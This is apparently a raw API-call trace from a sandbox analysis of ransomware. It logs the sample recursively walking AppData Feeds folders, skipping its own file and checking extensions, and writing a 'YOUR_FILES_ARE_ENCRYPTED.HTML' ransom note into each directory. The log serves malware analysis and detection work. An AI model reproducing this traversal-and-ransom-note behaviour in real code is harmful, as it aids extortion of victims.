RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.279] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0170.279] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*" [0170.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0170.279] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.279] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0170.279] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0170.279] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.280] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0170.280] lstrlenW (lpString=".feed-ms") returned 8 [0170.280] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0170.280] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 0 [0170.280] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.280] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0170.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5cc [0170.280] WriteFile (in: hFile=0x5cc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.282] CloseHandle (hObject=0x5cc) returned 1 [0170.282] GetProcessHeap () returned 0x270000 [0170.283] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.283] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0170.283] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.283] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0170.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.284] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.299] CloseHandle (hObject=0x604) returned 1 [0170.300] GetProcessHeap () returned 0x270000 [0170.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.300] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0170.300] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.301] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.301] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.303] CloseHandle (hObject=0x5fc) returned 1 [0170.303] GetProcessHeap () returned 0x270000 [0170.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.304] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0170.304] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned 56 [0170.304] GetProcessHeap () returned 0x270000 [0170.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.304] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache" [0170.304] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*" [0170.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.307] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.307] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="4CSSRV00", cAlternateFileName="")) returned 1 [0170.307] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned 65 [0170.307] GetProcessHeap () returned 0x270000 [0170.307] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.307] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00" [0170.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*" [0170.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\desktop.ini") returned 77 [0170.308] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.308] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.308] lstrlenW (lpString=".ini") returned 4 [0170.308] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\fwlink[1]") returned 75 [0170.308] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.308] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.308] lstrlenW (lpString="") returned 0 [0170.308] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.308] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8aa5825e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.308] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.308] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\4CSSRV00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\4cssrv00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.309] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.311] CloseHandle (hObject=0x604) returned 1 [0170.311] GetProcessHeap () returned 0x270000 [0170.312] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.312] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0170.312] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.312] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.312] lstrlenW (lpString=".ini") returned 4 [0170.312] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.312] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DT1GIE4D", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned 65 [0170.312] GetProcessHeap () returned 0x270000 [0170.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.312] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" [0170.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*" [0170.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.312] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.312] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\desktop.ini") returned 77 [0170.313] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.313] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.313] lstrlenW (lpString=".ini") returned 4 [0170.313] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.313] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.313] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\fwlink[1]") returned 75 [0170.313] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.313] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.313] lstrlenW (lpString="") returned 0 [0170.313] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.313] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.313] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.313] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\dt1gie4d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.314] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.316] CloseHandle (hObject=0x604) returned 1 [0170.316] GetProcessHeap () returned 0x270000 